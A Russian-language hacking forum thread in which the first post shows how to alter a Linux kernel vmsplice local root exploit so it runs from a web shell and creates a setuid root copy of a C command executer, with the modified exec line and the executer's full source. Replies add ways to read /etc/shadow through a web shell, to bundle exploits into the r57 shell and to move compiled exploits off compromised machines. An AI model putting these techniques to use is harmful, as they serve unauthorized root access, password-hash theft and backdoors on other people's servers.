Старый 04.07.2010, 18:47   #1
Grey
 
Аватар для Grey
 
Регистрация: 30.06.2010
Сообщений: 38
По умолчанию Запуск эксплойтов из под Web на примере "Linux Kernel 2.6.23 - 2.6.24 vmsplice"

На случай если нельзя забиндить порт и сделать бекконект.

Берем сплоент находим в нём строку запускающую Баш, уже из под рута:

execl("/bin/bash", "bash", "-i", NULL);
И заменяем её вот на такую:

execl("/bin/bash","/bin/bash", "-c", "cp ./exec ./exec2; chown root ./exec2; chgrp root ./exec2; chmod 755 ./exec2; chmod +s ./exec2;", NULL);

В результате будет выполняться указанная команда. В данном случае для exec2 будет добавлен суидный бит, а так же изменён владелец и группа файла, и поставлены права необходимые для выполнения файла.

exec - маленькая программка на c, выполняющая команды, её содержимое:

Код:
/* Command executer; Coded by Grey; */
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
if(argc == 2) {
setgid(0); setuid(0);
system(argv[1]); }
return 0;
}
Юзаем так:

Заливаем изменённый эксплойт sp, и программу exec.
Устанавливаем права для запуска эксплойта: chmod 755 sp
Запускаем эксплойт: ./sp
И если всё норм, получаем суидник exec2
Обращаемся к ниму следующим образом: ./exec2 "[cmd]", к примеру: ./exec2 "id"

P.S. подобную идею предлагал Dr.z3r0, чуть позже я добил её.
2009 © Grey

Последний раз редактировалось Grey; 04.07.2010 в 18:54..
Grey вне форума   Ответить с цитированием
Старый 04.07.2010, 19:39   #2
Twost
 
Аватар для Twost
 
Регистрация: 03.07.2010
Сообщений: 172
Репутация: 110
По умолчанию

Дополню, что некоторые эксплойты уже готовы для использования из Web, например bsd-ktimer для FreeBSD, там результатом выполнения эксплойта является не вызов оболочки, а присвоение процессу uid=0, т.е. можно использовать прямо из веб-шелла "./spl; cat /etc/shadow"
Twost вне форума   Ответить с цитированием
Старый 19.08.2010, 06:36   #3
[x26]VOLAND
 
Аватар для [x26]VOLAND
 
Регистрация: 06.07.2010
Сообщений: 16
Репутация: 8
По умолчанию

Прикрутить бы это дело к шеллу орба.
[x26]VOLAND вне форума   Ответить с цитированием
Старый 19.08.2010, 16:49   #4
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

Поддерживаю, к шеллу орба обязательно.
Nightmare вне форума   Ответить с цитированием
Старый 19.08.2010, 17:03   #5
Twost
 
Аватар для Twost
 
Регистрация: 03.07.2010
Сообщений: 172
Репутация: 110
По умолчанию

Тяжело реализовать - переписывать кучу сплойтов, я думал уже над этой идеей еще год назад наверное, единственный вариант - делать супер абузно-приватный сервер с базой данных - ядро-сплойт, и тянуть с шелла сплойт с этого сервера, но это - много заморочек, такой шелл в паблик нельзя, потому как сервер со сплоентами умрет, и т.д. и т.п.
да, и слишком много мучений, проще переписать сплойт за 2 минуты под свои нужды и залить на сервер отдельно. а идеи таких крякеров инета, а-ля "нажми кнопку - получи рут" никогда не заканчивались успешно, я в прошлом году привязывал суидник и сплоент под седьмую фрю к r57 - в принципе работало, но если разгуляться - то шелл будет весить 1 Мб с такими связками сплоентов.
Twost вне форума   Ответить с цитированием
Старый 19.08.2010, 18:31   #6
Luna-Tic
 
Регистрация: 19.08.2010
Сообщений: 31
Репутация: 3
По умолчанию

Еще можно попробовать завести псевдо терминал средствами cgi, очень удобоно если нужно передвигатся по сетке а бек конект не возможнек к примеру веб сервер вообще без инета (т.е нету гетвея в конфиге интерфейса) но доступ к вебу есть посредством проксификации маршрутизатора.
Luna-Tic вне форума   Ответить с цитированием
Старый 25.08.2010, 17:42   #7
napas_hd
 
Регистрация: 09.07.2010
Сообщений: 70
Репутация: 4
По умолчанию

Цитата:
Сообщение от 3x'e'orcist Посмотреть сообщение
ЗЫ:на другой тачке на которой я залил шелл все скомпилилось нормально, но как с шелла закачать скомпилиные файлы к себе на комп?
скопируй в видимую из веба папку и скачай.
napas_hd вне форума   Ответить с цитированием
Старый 25.08.2010, 20:03   #8
3x'e'orcist
 
Аватар для 3x'e'orcist
 
Регистрация: 12.08.2010
Сообщений: 10
Репутация: 2
По умолчанию

теперь другой прикол,нельзя загружать исполняемые файлы,причем чекается контент сплойта
3x'e'orcist вне форума   Ответить с цитированием
Старый 27.08.2010, 01:13   #9
snake
 
Регистрация: 05.07.2010
Сообщений: 173
Репутация: 12
По умолчанию

мб в tar/zip/gzip/bz2?
snake вне форума   Ответить с цитированием
Старый 27.08.2010, 15:46   #10
3x'e'orcist
 
Аватар для 3x'e'orcist
 
Регистрация: 12.08.2010
Сообщений: 10
Репутация: 2
По умолчанию

Цитата:
Сообщение от napas_hd Посмотреть сообщение
скопируй в видимую из веба папку и скачай.
1)там(шелл на котором удалось все скомпилировать) закрыт аплоад все происходит в папке тмп,вот из нее надо както залить скомпилиные сплойты к себе на комп...
2)а потом я попробую в архив как предложил Snake
3)Xcedz,незнаю как проверить?

p.s:шелл всо 2.3(тот на котром компилирую)
Userful: gcc, cc, ld, make, php, perl, python, tar, gzip, bzip2, locate, suidperl
Downloaders: wget, lynx, curl, lwp-mirror

а вот целевая система:
Userful: make, php, perl, python, tar, gzip, bzip2, locate
Downloaders: wget, lynx, links, curl, lwp-mirror
3x'e'orcist вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot